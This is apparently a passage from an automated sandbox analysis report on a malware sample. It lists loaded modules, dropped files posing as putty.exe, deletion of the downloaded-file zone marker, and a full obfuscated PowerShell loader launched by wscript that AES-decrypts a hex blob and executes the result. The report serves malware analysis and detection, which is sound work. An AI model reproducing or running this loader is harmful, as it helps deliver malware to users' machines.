                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuSection loaded: msimg32.dll
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuSection loaded: msvcr100.dll
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\putty.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuUnpacked PE file: 13.2.ddhfdfu.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                  Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell.exe -w 1 -ep Unrestricted -nop function wfMpF($MmiD){return -sp", "0", "true");
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function wfMpF($MmiD){return -split ($MmiD -replace '..', '0x$& ')};$Ralma = wfMpF('6DDD913A204EDA9B48CF5583720FA53B3C5CDEE6E974B7BF173341D66880A83528E76A5A809EDA47D2C263E95E00A51AE2A33D069542CCAE0C0FEF761523C7AFE37B64185C653B4C4BF39E67E1D89CD6636984FC646C493C76294187D1B2B75D79DBAAB680164B0C94848AA09BF281C313B7C3C2532160823EFECF40AF7A9240375A29DD3D82C002B29486566C166F6F04711F20F7F5B2B6CDC61AA7908A19FE7DE86886141F7A340433F1A7D86ED97FA28C2AC93960B814156D48D922F4B029C07206C1AEF6B44FF7AF133921B3DB8F2FF073F4CFFA862EDB9214CE28C296D8FB5162D5AB69B39935125AB3242B742A33D4141147FCF532EEB49A69FEA321ACE3E5BFFDC1520FB98A143BBAFD22BB525550D37D463F288C61A14B1258687EB239E9A260D0E160D9614F09967FE97F9B2CE6BE1C24011E78CAAB16CEEA4345678EAB2756D340EA7C849F355578CB519AA0DE8625F493EADBD13583073BE0D247EBD15CD925FE851855979D18651080CF3BD6FB803715B373C134F7D1EA1E3FAB7E02D0D4AD6FC40EAD36C911A1AE73D421AC10EFE01473747C3B4FC05FD6D4D08C3521DB6BA6E9EEF6CB8B1C7FC76884C910C22860E3575831C23A88693A6D7FE1F158E001ED75B4588C08ED639A5B3F223E76CF1C17495201F16D4149F714CA4BD42D2D5E17399CF5E4FCAE83C94E9DBA2089F3C430CE2585999674221CE62E61DCB128072E936B5DFED4CEBEEBA9232E582C33488E026E0F5123211B5E9B12B46C0CA95D1F9A903B6B2310CB4E108C5C9B8328E9021E1B76EAE56EF681BBC20E3C74BCCAA8E25DECF9C13896D1252B4B86B2315F62ECC43FDD7F9D446C70E046C7872722C69950AC7A26563C81C0A52F3B0F0D43D41FE0060D34820472AE9A9818D2FD3B117A4B0084EAA21D1666A9297DCAEACADD63462FBB1E22C56869537CA0C0E1CD52EABFF12858BC9B1DDDC8CB4C70E9FA2549B5144F447D1DEFC94F5830D9CAC04660B19C385EC1A3D989AC7BAD8C3E7E908C697C4DA249D156475901B73F3C800C602E586AA6998C17EB947E3D2E8A13E7292546210AF7EB29B003DA7407AF81F5B7811619B414E06D1D724EF79FE960509F6D85F4B55A5B6A365F6EE49825F0B19433EA2C64737468F1FAA1DDA90E230F23CB6751052459789FAC25AB27097516E251B4C56D5B1497389F33F64F9C729FADB9F635E6771D884FFAD2363C3D29D49812042636E0B8AAEE30');$idRJO=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((wfMpF('4F6C6D774C5361495051654D7258624F')),[byte[]]::new(16)).TransformFinalBlock($Ralma,0,$Ralma.Length)); & $idRJO.Substring(0,3) $idRJO.Substring(3)
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function wfMpF($MmiD){return -split ($MmiD -replace '..', '0x$& ')};$Ralma = wfMpF('6DDD913A204EDA9B48CF5583720FA53B3C5CDEE6E974B7BF173341D66880A83528E76A5A809EDA47D2C263E95E00A51AE2A33D069542CCAE0C0FEF761523C7AFE37B64185C653B4C4BF39E67E1D89CD6636984FC646C493C76294187D1B2B75D79DBAAB680164B0C94848AA09BF281C313B7C3C2532160823EFECF40AF7A9240375A29DD3D82C002B29486566C166F6F04711F20F7F5B2B6CDC61AA7908A19FE7DE86886141F7A340433F1A7D86ED97FA28C2AC93960B814156D48D922F4B029C07206C1AEF6B44FF7AF133921B3DB8F2FF073F4CFFA862EDB9214CE28C296D8FB5162D5AB69B39935125AB3242B742A33D4141147FCF532EEB49A69FEA321ACE3E5BFFDC1520FB98A143BBAFD22BB525550D37D463F288C61A14B1258687EB239E9A260D0E160D9614F09967FE97F9B2CE6BE1C24011E78CAAB16CEEA4345678EAB2756D340EA7C849F355578CB519AA0DE8625F493EADBD13583073BE0D247EBD15CD925FE851855979D18651080CF3BD6FB803715B373C134F7D1EA1E3FAB7E02D0D4AD6FC40EAD36C911A1AE73D421AC10EFE01473747C3B4FC05FD6D4D08C3521DB6BA6E9EEF6CB8B1C7FC76884C910C22860E3575831C23A88693A6D7FE1F158E001ED75B4588C08ED639A5B3F223E76CF1C17495201F16D4149F714CA4BD42D2D5E17399CF5E4FCAE83C94E9DBA2089F3C430CE2585999674221CE62E61DCB128072E936B5DFED4CEBEEBA9232E582C33488E026E0F5123211B5E9B12B46C0CA95D1F9A903B6B2310CB4E108C5C9B8328E9021E1B76EAE56EF681BBC20E3C74BCCAA8E25DECF9C13896D1252B4B86B2315F62ECC43FDD7F9D446C70E046C7872722C69950AC7A26563C81C0A52F3B0F0D43D41FE0060D34820472AE9A9818D2FD3B117A4B0084EAA21D1666A9297DCAEACADD63462FBB1E22C56869537CA0C0E1CD52EABFF12858BC9B1DDDC8CB4C70E9FA2549B5144F447D1DEFC94F5830D9CAC04660B19C385EC1A3D989AC7BAD8C3E7E908C697C4DA249D156475901B73F3C800C602E586AA6998C17EB947E3D2E8A13E7292546210AF7EB29B003DA7407AF81F5B7811619B414E06D1D724EF79FE960509F6D85F4B55A5B6A365F6EE49825F0B19433EA2C64737468F1FAA1DDA90E230F23CB6751052459789FAC25AB27097516E251B4C56D5B1497389F33F64F9C729FADB9F635E6771D884FFAD2363C3D29D49812042636E0B8AAEE30');$idRJO=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((wfMpF('4F6C6D774C5361495051654D7258624F')),[byte[]]::new(16)).TransformFinalBlock($Ralma,0,$Ralma.Length)); & $idRJO.Substring(0,3) $idRJO.Substring(3)Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F100BD pushad ; iretd 2_2_00007FF848F100C1
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_00401068 push ebp; iretd 6_2_0040106E
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_004010B4 push ss; ret 6_2_004010B5
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_0040D099 push ecx; ret 6_2_0040D0AC
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_00563001 push es; iretd 6_2_00563002
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_005628C1 push ebp; iretd 6_2_005628C7
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_00564883 push ebx; ret 6_2_00564889
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_0056290D push ss; ret 6_2_0056290E
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_00569323 push esi; retf 6_2_00569324
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_00566D99 push ds; ret 6_2_00566DAC
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_006D111B push ss; ret 6_2_006D111C
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_006D10CF push ebp; iretd 6_2_006D10D5
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_006D18DC push es; iretd 6_2_006D18DD
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_00401068 push ebp; iretd 13_2_0040106E
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_004010B4 push ss; ret 13_2_004010B5
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_0040D099 push ecx; ret 13_2_0040D0AC
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_00553001 push es; iretd 13_2_00553002
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_005528C1 push ebp; iretd 13_2_005528C7
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_00554883 push ebx; ret 13_2_00554889
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_0055290D push ss; ret 13_2_0055290E
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_00559323 push esi; retf 13_2_00559324
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_00556D99 push ds; ret 13_2_00556DAC
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_0061111B push ss; ret 13_2_0061111C
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_006110CF push ebp; iretd 13_2_006110D5
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_006118DC push es; iretd 13_2_006118DD
                  Source: putty.exe.2.drStatic PE information: section name: .text entropy: 7.689851588772987
                  Source: ddhfdfu.12.drStatic PE information: section name: .text entropy: 7.689851588772987
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\putty.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ddhfdfuJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ddhfdfuJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\ddhfdfu:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
